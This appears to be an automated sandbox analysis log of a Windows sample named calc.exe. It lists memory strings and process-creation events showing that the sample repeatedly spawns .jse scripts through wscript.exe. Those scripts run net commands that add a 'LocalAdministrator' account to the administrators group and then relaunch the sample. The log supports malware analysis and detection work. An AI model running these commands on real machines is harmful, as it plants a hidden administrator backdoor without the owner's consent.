Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: calc.exe | String found in binary or memory: IWshShell3.Run("wscript.exe WQTz1XtcXV.jse", "1", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: calc.exe | String found in binary or memory: IWshShell3.Run("wscript.exe 7s3912SDjb.jse", "1", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: wscript.exe | String found in binary or memory: IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("net user LocalAdministrator /add", "0", "false");IWshShell3.Run("net localgroup administrators LocalAdministrator /add", "0", "false");IWshShell3.Run("calc.exe", "1", "false"); |
Source: unknown | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" JI8Y5YVUqE.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding | |
Source: unknown | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: unknown | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" B2G43eAZZY.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" fpiLr93KlC.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" WQTz1XtcXV.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" BjFMi3zobq.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" Xv6oI7oFep.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 5RDffnTbZa.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" xIrKq0jy1l.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" bBF4cMvje3.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" xdbrdZA2Mp.jse | |
Source: C:\Windows\SysWOW64\net1.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\net1.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\net1.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 7s3912SDjb.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" dIsc26ydj8.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 7G6GlIeRfv.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" AiCGETgrpF.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" FB3eszo6iK.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" 90NgPeo2cD.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup administrators LocalAdministrator /add | |
Source: C:\Users\user\Desktop\calc.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" JEsdrI4PXS.jse | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" user LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\System32\net.exe" localgroup administrators LocalAdministrator /add | |
Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Users\user\Desktop\calc.exe "C:\Users\user\Desktop\calc.exe" | |
